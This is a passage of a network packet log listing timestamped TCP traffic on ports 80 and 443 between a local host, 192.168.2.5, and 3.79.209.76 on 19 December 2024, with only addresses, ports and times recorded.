                                    Dec 19, 2024 22:47:45.282779932 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.282915115 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.282965899 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.287642002 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.287695885 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.287741899 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.292335033 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.292460918 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.292511940 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.297240019 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.297352076 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.297468901 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.301971912 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.302056074 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.302105904 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.306715012 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.307071924 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.307117939 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.311532021 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.311585903 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.311635017 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.316378117 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.316474915 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.316538095 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.321089983 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.321191072 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.321243048 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.325946093 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.326004028 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.326209068 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.330668926 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.330826044 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.330933094 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.334486008 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.334585905 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.334633112 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.338354111 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.338449001 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.338502884 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.342106104 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.342223883 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.342269897 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.345961094 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.346065998 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.346121073 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.349770069 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.349852085 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.349898100 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.353539944 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.353648901 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.353694916 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.357379913 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.357548952 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.357673883 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.361239910 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.361373901 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.361419916 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.391722918 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.391804934 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.391865015 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.393600941 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.393762112 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.393918037 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.463993073 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.464128971 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.464251995 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.464251995 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.465456963 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.465586901 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.465640068 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.468436956 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.468555927 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.468611956 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.471378088 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.471533060 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.471611977 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.474349022 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.474457979 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.474513054 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.477266073 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.477325916 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.477405071 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.479980946 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.480103016 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.480149984 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.482764006 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.482780933 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.482825041 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.485513926 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.485716105 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.485754967 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.488004923 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.488080978 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.488123894 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.490576982 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.490684032 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.490731955 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.493122101 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.493284941 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.493339062 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.495790005 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.495872974 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.495923042 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.498251915 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.498429060 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.498471975 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.500945091 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.501061916 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.501108885 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.503437042 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.503568888 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.503612995 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.506004095 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.506262064 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.506402969 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.508615971 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.508795023 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.508846998 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.511182070 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.511344910 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.511394024 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.513772011 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.513874054 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.513957024 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.516335011 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.516415119 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.516463995 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.518857002 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.519107103 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.519155979 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.520783901 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.520900011 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.520946026 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.522633076 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.522752047 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.522814989 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.524473906 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.524621010 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.524682045 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.526310921 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.526454926 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.526499033 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.528192997 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.528307915 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.528350115 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.530035019 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.530150890 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.530193090 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.531951904 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.532100916 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.532145023 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.533751965 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.533911943 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.533953905 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.535624027 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.535742998 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.535784006 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.537550926 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.537621975 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.537662029 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.539359093 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.539442062 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.539482117 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.541246891 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.541357994 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.541399002 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.543184996 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.543278933 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.543327093 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.656475067 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.656569958 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.656621933 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.657191038 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.657346010 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.657390118 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.658849001 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.658988953 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.659032106 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.660593987 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.660739899 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.660779953 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.662000895 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.662115097 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.662161112 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.663589001 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.663681030 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.663729906 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.665143967 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.665251970 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.665294886 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.666651011 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.666845083 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.666884899 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.668164015 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.668364048 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.668409109 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.669667006 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.669783115 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.669825077 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.671142101 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.671240091 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.671278954 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.672610044 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.672720909 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.672764063 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.674608946 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.674760103 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.674803972 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.675820112 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.675923109 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.675966024 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.677098036 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.677207947 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.677249908 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.678594112 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.678689957 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.678740978 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.680071115 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.680195093 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.680262089 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.681557894 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.681694984 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.681732893 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.683057070 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.683259010 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.683300972 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.684578896 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.684736967 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.684778929 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.686039925 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.686136007 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.686178923 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.687525988 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.687695026 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.687737942 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.689050913 CET80499383.79.209.76192.168.2.5
                                     Dec 19, 2024 22:47:45.689147949 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.689203024 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.690537930 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.690612078 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.690651894 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.692002058 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.692118883 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.692161083 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.693538904 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.693636894 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.693703890 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.694991112 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.695116043 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.695162058 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.696495056 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.696610928 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.696655035 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.698016882 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.698120117 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.698163986 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.699515104 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.699600935 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.699641943 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.701015949 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.701137066 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.701195955 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.702467918 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.702585936 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.702630997 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.703982115 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.704093933 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.704135895 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.705461979 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.705733061 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.705775976 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.707118988 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.707176924 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.707222939 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.708441973 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.708576918 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.708619118 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.709939957 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.709985971 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.710109949 CET | 49938 | 80 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.829502106 CET | 80 | 49938 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.948254108 CET | 49946 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.948290110 CET | 443 | 49946 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:45.948363066 CET | 49946 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.961430073 CET | 49946 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:45.961467028 CET | 443 | 49946 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:47.362474918 CET | 443 | 49946 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:47.362576962 CET | 49946 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:47.418261051 CET | 49946 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:47.418327093 CET | 443 | 49946 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:47.418678999 CET | 443 | 49946 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:47.418742895 CET | 49946 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:47.420763969 CET | 49946 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:47.467328072 CET | 443 | 49946 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:48.218329906 CET | 443 | 49946 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:48.218398094 CET | 443 | 49946 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:48.218466997 CET | 49946 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:48.218534946 CET | 443 | 49946 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:48.218570948 CET | 443 | 49946 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:47:48.218570948 CET | 49946 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:48.218600988 CET | 49946 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:48.218635082 CET | 49946 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:48.218815088 CET | 49946 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:47:48.218868971 CET | 443 | 49946 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:01.711493015 CET | 49979 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:01.711571932 CET | 443 | 49979 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:01.711666107 CET | 49979 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:01.717787027 CET | 49979 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:01.717818975 CET | 443 | 49979 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:03.105918884 CET | 443 | 49979 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:03.106050968 CET | 49979 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:03.106532097 CET | 49979 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:03.106564999 CET | 443 | 49979 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:03.108278990 CET | 49979 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:03.108293056 CET | 443 | 49979 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:03.797652006 CET | 443 | 49979 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:03.797713995 CET | 443 | 49979 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:03.797739983 CET | 49979 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:03.797791958 CET | 443 | 49979 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:03.797847986 CET | 49979 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:03.797847986 CET | 49979 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:03.797859907 CET | 443 | 49979 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:03.797899008 CET | 49979 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:03.797940969 CET | 49979 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:03.797971964 CET | 443 | 49979 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:13.529289007 CET | 49980 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:13.529334068 CET | 443 | 49980 | 3.79.209.76 | 192.168.2.5
                                     Dec 19, 2024 22:48:13.529428005 CET | 49980 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:13.529742956 CET | 49980 | 443 | 192.168.2.5 | 3.79.209.76
                                     Dec 19, 2024 22:48:13.529757977 CET | 443 | 49980 | 3.79.209.76 | 192.168.2.5
